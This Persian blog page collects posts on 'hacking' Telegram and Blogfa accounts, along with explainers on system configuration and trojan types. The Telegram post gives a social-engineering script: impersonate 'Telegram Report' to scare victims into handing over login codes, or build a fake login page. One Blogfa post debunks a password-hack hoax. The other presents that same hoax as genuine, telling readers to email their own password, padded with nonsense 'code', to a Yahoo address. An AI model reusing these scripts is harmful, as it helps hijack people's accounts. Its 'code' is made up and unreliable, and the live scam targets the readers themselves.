خب بطور کلی ۳ روش جامع واسه هک تلگرام وجود داره


برای ادامه اموزش به ادامه مطلب مراجعه کنید.


1_ هک گوشی دیگران که در این روش ما پیام هاشو هک میکنیم و در تلگرام خودمون شمارشو وارد میکنیم و کد ۵ رقمی که واسش ارسال میشه رو در برنامه تلگرام وارد میکنیم که اموزش هک گوشی در سایت قرار داده شده و راه های دیگش هم قرار داده میشه

2_ دومین روش از طریق مهندسی اجتماعی هستش که ما در این روش میایم با یه دروغ هایی طرف رو وادار میکنیم که کد ۵ رقمی رو خودش با دست خودش بهمون تقدیم کنه که معمولا روی افرادی کاربرد داره که تازه تلگرام نصبیدن یا دختر باشن
روش کلیشم اینجوریه که ما یه اکانت تلگرام میسازیم بعدش عکس پروفایل رو عکس تلگرام میزاریم و اسممونم یه چیزی میزاریم که طرف شک نکنه مثل Telegram Report و از همه مهمتر ایدی هم باید یه چیزی بزاریم که طرف اصلا شک نکنه مثل @telegram_report_spam
خب بعدش با یه متن انگلیسی که مثلا گفته اگه تا ۱۲ ساعت آینده کد ۵ رقمی رو برای ما ارسال نکنید اکانت شما دلیت میشود یا ریپورت نمیشم یه چیزایی توی همین مایه ها
یادتون باشه که وقتی به تلگرامش وصل میشین یه پیام مبتنی بر اینکه یه نفر دیه به تلگرامتون وصل شده ارسال میشه روی اکانت یارو و همچنین مخاطبین شما با طرف یکی میشه

3_ سومین روش استفاده از فیک پیج هستش که در این روش یه صفحه تقلبی مثل خود تلگرام میسازید که طرف شمارشو وارد کنه و بعدش کد ارسالی روی گوشیشو هم وارد کنه
یکی از رفیقام یه فیک پیج ساخته بود خیلی ازش خوشم اومد که در واقع توی این روش از یه مشکلی که اکثر کاربران تلگرام دارن استفاده کرده بود
توی این فیک پیج یه گزینه مبتنی بر ریپورت بودن بود که شما میرفتی شمارتو وارد میکردی و بعدش کد ۵ رقمی و در اخر بهت میگفت که بزودی مشکل ریپورت از اکانت شما برداشته خواهد شد که کمتر کسی شک میکرد
برای ساخت این فیک پیج شما نیاز به دانش زبان های برنامه نویسی دارین که بتونین یه صفحه وب رو طراحی کنین

امیدوارم مفید بوده باشه.

هـــک تـلـگـرام1

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:هـــک تـلـگـرام1, 311 بازدید
ادامه و دانلود

دانلود آهنگ جدید کانفیگ سیستم به همراه متن و پخش آنلاین

کانفیگ سیستم

 

کانفیگ همان مخفف کلمه Configuration می‌باشد که برگرفته از ترکیب System Configuration به معنای پیکربندی سیستم است. یعنی اینکه پیکربندی سخت افزاری سیستم شما به چه صورت است. این موارد شامل، سی پی یو، مادربورد، رم، کارت گرافیک، هارد، سی دی رام، دی وی دی رام و ... به همراه مدل و مشخصات فنی آن‌ها است. به عنوان مثال ممکن است کانفیگ سیستم شما مانند زیر باشد:

 

 

 

  • Intel Core i5 760 2.88 Stock
  • MSI P55-GD80
  • Sapphire HD 5770 *2 CrossfireX
  • 4GB XMS3 Corsair DDR3 1600 of RAM
  • HDD: 1Tb Hitachi
  • PSU: Memonex EX 600W, low noise series

 

البته در مورد لپ تاپ هم این قضیه صدق می‌کند.

کانفیگ سرور

 

امروزه میزبانی وب به یک صنعت بزرگ جهانی تبدیل شده و دیتاسنترها، وب مسترها، مدیران هاستینگ و … نقش اساسی در این صنعت دارند. میلیون‌ها سایت در دیتاسنترهای مختلف و در سرورهای مختلف میزبانی می‌شوند و هاستینگ‌ها هر کدام در حال رقابت و تلاش برای پیشی گرفتن از رقیبان خود هستند. در این میان سرورها، توان پاسخ گویی آن‌ها، سرعت و امنیت برای هر مشتری ملاک انتخاب یک هاستینگ خوب هستند. از طرفی کانفیگ سرورها و پیاده سازی همه این موارد بدون بروز اختلال نیازمند دانش فنی بالا با تجربه ای کافیست تا انتظارات هر مشتری را برآورده ساخت.

کانفیگ سرور با توجه به موارد استفاده شما متفاوت می‌باشد و نیازمند بررسی وضعیت با توجه به میزان بازدیدهای، فشار وارد بر سرور، تعداد سایت‌ها و … می باشد.

کانفیگ سرور به دو دسته تقسیم می‌شود:

 

  • کانفیگ سرور‌های شخصی
  • کانفیگ سرورهای هاستینگ اشتراکی
 
کانفیگ سرور های شخصی:

 

کانفیگ سرورهای شخصی با توجه به میزبانی تعداد سایت پایین و البته راحتی انجام برخی کانفیگ‌ها روی سرور شخصی متفاوت با سرورهای هاستینگ اشتراکی می‌باشد. قدرتمندترین پنل‌های هاستینگ نیز سرعت، امنیت و پایداری را به صورت همزمان برای شما فراهم نخواهند کرد چرا که تنظیم و بهینه سازی تعداد زیادی سرویس برای هر سرور کاملا منحصر به فرد بوده و فقط با تشخیص یک متخصص قابل انجام است که مطمئنا کنترل پنل‌ها این قابلیت را ندارند...

 

 کانفیگ سرور های هاستینگ اشتراکی:

 

کانفیگ سرورهای اشتراکی بسیار مهم و حساس است، در حقیقت هرگونه اشتباه در کانفیگ این سرورها موجب نارضایتی مشتریان و از دست رفتن اعتبار شما خواهد شد. کانفیگ حرفه ای سرور این توان را برای شما ایجاد خواهد کرد تا بدون ارتقای سخت افزاری، تعداد سایت های بیشتری را با کیفیت و بازده بالاتر میزبانی کنید.

 

کانفیگ سیستم

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:کانفیگ سیستم, 337 بازدید
ادامه و دانلود

دانلود آهنگ جدید تروجان چیست؟؟؟ به همراه متن و پخش آنلاین

تروجان چیست؟؟؟

 

تروجان، برنامه مخربی است که به صورت یک نرم افزار جالب به نظر می‌رسد .بر عکس ویروس‌ها، تروجان‌ها تکثیر نمی شوند؛ ولی به‌‌ اندازۀ ویروس  ها مخرب هستند. یکی از انواع تروجان‌ها، برنامه‌ای است که ادعا می‌کند، کامپیو‌تر شما را از شر ویروس‌ها نجات می‌دهد؛ اما در حقیقت ویروس‌ها را با سیستم شما آشنا و به آنها معرفی می‌کنند.


لغت تروجان برگرفته از افسانۀ یونانی جنگ تروجان است. در این داستان یونانی‌ها از طریق هدیه دادن اسب چوبی بزرگی به دشمنانشان، تعدادی سرباز به قلعۀ آن‌ها فرستادند؛ سپس این سرباز‌ها از داخل اسب بیرون آمده و درب قلعه را باز کردند تا دیگر افراد به داخل قلعه بیایند و قلعه را فتح کنند. این مثال دقیقاً عملی است که تروجان با کامپیو‌تر شما انجام می‌دهد. تروجان ابتدا به قسمت های مختلف نفوذ می‌کند؛ سپس، راهی برای آسیب به آنها پیدا خواهد کرد.

در زیر برخی از انواع تروجان و عملکرد آن‌ها را به اختصار بیان می‌کنیم:

تروجان کنترل دسترسی(RTA)

یک تروجان کنترل دسترسی(RTA )، برای فراهم کردن دسترسی مهاجمان به کنترل کامل سیستم کامپیوتر قربانی، طراحی شده است. مهاجمان اغلب این نوع تروجان را در بازی‌ها و برنامه‌های کوچک قرار می‌دهند تا هیچ کاربری به آن مشکوک نشود؛ سپس از آن طریق، کامپیو‌تر شخص را مورد تهاجم قرار می‌دهند.

تروجان مخرب

این نوع از تروجان ها برای تخریب و حذف فایل‌ها طراحی شده‌اند و از این جهت بسیار شبیه به ویروس‌ها هستند. آن‌ها اغلب با نرم افزارهای آنتی ویروس قابل ردیابی نیستند.

تروجان‌های پروکسی

این نوع از تروجان‌ها برای تخریب برنامه های کامپیوتر قربانی، به عنوان پروکسی سرور، طراحی شده‌اند. ورود تروجان ها از این طریق اجازۀ هر عملی را در کامپیو‌تر شما، به مهاجمان می‌دهد، از جمله: کلاهبرداری از کارت های اعتباری و فعالیت های غیر قانونی و حتی استفاده از کامپیو‌تر شما برای فرستادن حمله‌های خطرناک به دیگر کامپیوترهای شبکه.

تروجان‌های FTP

این تروجان‌ها پورت ۲۱ (پورت ارسال اطلاعات) کامپیو‌تر شما را باز می گذارند و به مهاجمان اجازه اتصال به کامپیو‌تر شما و استفاده از FTP (پروتکل ارسال اطلاعات) را می‌دهند.

تروجان مخرب نرم افزارهای امنیتی

این تروجان‌ها، نرم افزار امنیتی کامپیو‌تر، مانند آنتی ویروس‌ها یا دیوارهای آتش‌ را بدون اینکه شما متوجه شوید، متوقف می‌کنند یا از بین می‌برند. این نوع از تروجان؛ اغلب با دیگر انواع تروجان ترکیب می‌شوند و آثار بسیار مخربی دارند.

با این تفاسیر متوجه می‌شویم که افشای اطلاعات ما می‌تواند به راحتی از طریق دانلود یک بازی یا یک برنامه، بدون اینکه حتی متوجه شویم، صورت پذیرد؛ پس سعی کنیم با دقت هر چه بیشتر امنیت کامپیو‌تر و اطلاعات شخصی خود را حفظ کنیم.

تروجان چیست؟؟؟

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:تروجان چیست؟؟؟, 318 بازدید
ادامه و دانلود

دانلود آهنگ جدید هک وبلاگ 2 به همراه متن و پخش آنلاین

این روش به تازگي از طرف يكي از بزرگترين گروه هك ايران نوشته شده منم براتون گذاشتم بريد حال كنيد ما كه بلاگفا نداريم البته بايد براي اين كار حتما يه وبلاگ داشته باشين چون اين روش طوريه كه همه يوزر وپسورد فرد قرباني به قسمت تنظيمات وبلاگتون ميره.

خوب بريم سر كارمون تو اين روش شما بايد يه سري كد رو كه گروه هكر ايراني نوشتن براي ايميل خود كار بلاگفا بفرستيد تا اون ربات خودكار فرستادن ايميل هنگ كنه بعدش يه سري نوشته براتون تو قسمت تنضيمات وبلاگتون مياد كه بايد به اون قسمت از وبلاگتون بريد و يوزر و پسورد قرباني رو بخونيد (البته يه موضوع خنده دار هم وجود داره من نميدونم كه چرا بلاگفا با اون همه عظمتش چرا از سيستم ياهو براي روبات خودكار فرستادن ميل استفاده كرده شايد هم ياهو امنيتش بيشتر از بقيس خدا ميدونه ديگه )

خوب از كارمون دور شديم بريم سر كارمون داشتم ميگفتم شما بايد كدها زير رو براي روبات فرستادن خودكار ميل بلاگفا بفرستيد (حتما بلديد كه)

شما بايد در قسمت to ميل روبات بلاگفا رو بنويسيد كه اينه ميلش

 r_blogfa@yahoo.com

ميله ديگه هم داره ولي مثه اينكه از كار افتاده به ما چه...

خوب در قسمت subject بايد نام وبلاگ اون بنده خودا رو بنوسيد مثلا

www.user name.blogfa.com

خوب قسمت مهمش اون كدس كه پايين نوشتم ولي بايد يه سري تغييرات توش بدين كه بعد از كدها ميگم چيه.

کدها

< FONT>

< FONT name="password of host"> &>#@#

whois.internic.net (The InterNIC)

< FONT h="netestat" username=<"نام کاربری">


whois.onlinenic.com (The OnLineNIC)

^&%^&"£""!http://www.blogfa.com/ForgetPassword.aspx

if hang the server send pass & user to <"
نام كاربري"> &<" پسورد"> for one minute
whois.nic.gov (US Government)

----if the webloge of blogfa not find send a email to <ايميل شما"> for one minute

-----end programe----

 

حالا تغييرات

خوب شما تو اين كد دو جا براي وارد كردن يوزرنيم(نام كاربري) دارين كه اوليش براي كسانيه كه از وبلاگ ميهن بلاگ استفاده ميكنن ( اگه از غير از ميهن بلاگ استفاده ميكنيد تو اين قسمت چيزي ننويسيد)

ولي قسمت دوم براي نام كاربري بايد نام كاربري وبلاگتون رو و در قسمت پسورد هم كه معلومه بايد پسورد وبلاگتون رو بدبد كه هنگام هنگ كردن ربات سرور بلاگفا تمام اطلاعات مسقيما به قسمت تنظيماتتون بره در نظر داشته باشيد كه اين ايميل فقط فقط براي روبات سرور بلاگفا ميره

خوب پس از تغييرات بعدش اونو بفرستيد بعد كه فرستاد يه بار ديسكانكت كنيد بعد دوباه آن شيد . اگه از بلاگفا استفاده ميكنيد به اون قسمتي كه مخصوص فرستادن كده بالاش نوشته كدها آمار وبلاگ كد موزيك و... اگه نه به قسمت ويرايش قالب وبلاگتون بريد و آخر كد وبلاگتون رو بياريد بقيش رو خودتون حدس ميزنيد ديگه....

براي مثال من اين وبلاگ رو خودم با همين روش هك كردم كه نتايجش رو در پايين قسمت ويرايش وبلاگم ديدم و براي شما قرار دادم اينم وبلاگش

www.download_music20.blogfa.com

Host Name .ـ(download_music20) : My Computer Name Here) نام كاربري وبلاگ هاستينگ
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
password(1234251547mohamad)l
در این قسمت کلمه عبور وبلاگ
Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003

دست نگه دارید.......

آخه کدوم (....) باور می کنه که بلاگفا امکاناتش رو از یاهو بگیره.! یاهو هم با چهار تا خط هنگ کنه بره تو بلاگفا یوزر و پسورد شما رو بنویسه و بعد یوزر و پسورد طرف درخواستی رو براتون .... (تازه نکته دیگه اینه که تو کجای صفحه مدیریت بلاگفا بنویسه...)

ولی این جمله رو حتما می نویسه:

این وبلاگ هک شد!

به این روش هک، هک اجتماعی می گن.

این تازه یه روش هک وبلاگه. یه روش دیگه هست که جدیداً کلی طرفدار داره:

ایمیل هایی توسط هکر ها برای بعضی از وبلاگ نویسان فرستاده میشود و از آنها میخواهد تا به یک صفحه تقلبی بروند و به دلایل مختلف مانند upgrade کردن وبلاگشون و یا دریافت امکانات جدید ، نام کاربری و پسوردشان را وارد کنند . فارغ از اینکه صفحه مورد نظر، یک صفحه تقلبی است که فقط شبیه سرویس دهنده وبلاگشان درست شده است و در حال جمع آوردی اطلاعات خصوصی کاربران است .

نکات امنیتی برای جلوگیری از هک شدن وبلاگتان :

1- هیچ سرویس دهنده وبلاگی به غیر از صفحه ورودی سایت خودش ، از شما پسورد درخواست نمی کند . پس همیشه قبل از اینکه پسوردتان را وارد کنید آدرس بالای internetExplorer خود را نگاه کنید که حتما آدرس سایت وبلاگتان باشد.

2- سرویس دهنده های وبلاگی به هیچ عنوان نیازی به پسورد شما ندارند. بنابراین در هیچ ایمیل و صفحه ای خارج از سایت سرویس دهنده ، پسورد خود را وارد نکنید .

هک وبلاگ 2

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:هک وبلاگ2, 307 بازدید
ادامه و دانلود

دانلود آهنگ جدید آموزش هک وبلاگ (قسمت اول) برای مثال بلاگفا به همراه متن و پخش آنلاین

http://s1.picofile.com/file/7778951933/527275257026075.png

وردمون یادمون می ره میریم از اونجا می گیریم (منظور همان forgot password است)

 

 

 

اولین پست رو یکی از جذاب ترین هک ها انتخاب کردم تا ایشالا شروع خوبی باشه پس خوب گوش بدید
روشی که باهاش میتونید بلگفای دوستتونو هک کنید و حالشو بگیرید
ما باید اول سیستم امنیتیشو از کار بنداریم یعنی همون جایی که ما پسوردمون یادمون می ره میریم از اونجا می گیریم (منظور همان forgot password است)برای این کار ابتدا وارد ایمیل خودتان (ایمیلی که در قسمت ایمیل خصوصی وبلاگ خودتون هست استفاده کنین) شوید و سپس مراحل زیر را به طور کامل انجام دهید :۱-برید به Compose همون جایی که میل می فرستید
در قسمت to بزنید blogtesk@yahoo.com
۲در قسمت Subject آدرس وبلاگی که قرار هک بشه بزنید ۳و در قسمت سوم همون جایی که میل می زنید باید این رو بزنید تا بلاگفا هنگ کند:

k1s%%@^@#LDMCA-23a_112~!!233#()$392(@)#)$(%s
###your weblog###!*&#^$@
###Your password###@@#!
*!&#%$%!@_)!#&$%@$@_#) """
::her or his weblog::
به جای your weblog وبلاگ خودتون و به جای Your password پسورد خودتون و به جای Her or his weblogوبلاگ کسی که می خواهید هکش کنید را بنویسید
بعد از انجام درست مراحل بالا پسورد وبلاگ کسی که می خواستید هکش کنید برای شما ایمیل میشه

اما باید بگم نباید زیاد خوشحال باشید چون شما با در دست داشتن رمز ورود دوستتون وارد وبش میشید ومسلما اولین کاری که میکنید اینه که رمزشو تغییر بدید و وبلاگشو تصاحب کنید با این کار فقط میتونید وبشو حدود چن ساعتی هک کنید چون بلافاصله ژس از تغییر رمز این رمز جدید توسط یاهو برای صاحب اصلی وبلاگ فرستاده میشه و شما دیگه کاری ازتون ساخته نیست چون اگه بار دوم صاحب اصلی وبلاگ رمزو تغییر بده دیگه به هیچ وجه هک نخواهد شد.

پس دقت کنید شما همه ی مراحل بالا رو انجام بدید.
ولی هول نکنید و وقتی وارد وبلاگ طرف شدید اصلا رمزشو تغییر ندید به هیچ وجه..بازم تاکیید میکنم به هیچ وجه

تا اینجا شما میتونید وارد وب طرف بشید و مطالبشو دست کاری کنید اما به هیچ وجه رمزو تغییر ندید..تغییر دادن رمز خودش یه ترفند دیگه میخواد که ایشالا در صورت استقبال پست بعدی رو بهش اختصاص میدم..نکته : این روش برای وبلاگ هایی که از سایت بلاگفا ساخته شده باشند ۱۰۰٪ کار میکنه ولی در مورد وبلاگ هایی که از سایت های دیگر ساخته شده باشند احتمال جواب دادن ۵۰ ٪ می باشد.نکته بسیار مهم : حتما باید وبلاگ خودتان که در ایجا وارد میکنید حداقل ۱ ماه از ساختش گذشته باشه و حدود ۱۰ پست در وبلاگتان داده باشید ... در غیر این صورت نمی توانید از این ترفند استفاده کنید ... امیدوارم ازش استفاده های بد بد نکنین فقط در حد حالگیری

 

آموزش هک وبلاگ (قسمت اول) برای مثال بلاگفا

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:آموزش هک وبلاگ (قسمت اول) برای مثال بلاگفا, 321 بازدید
ادامه و دانلود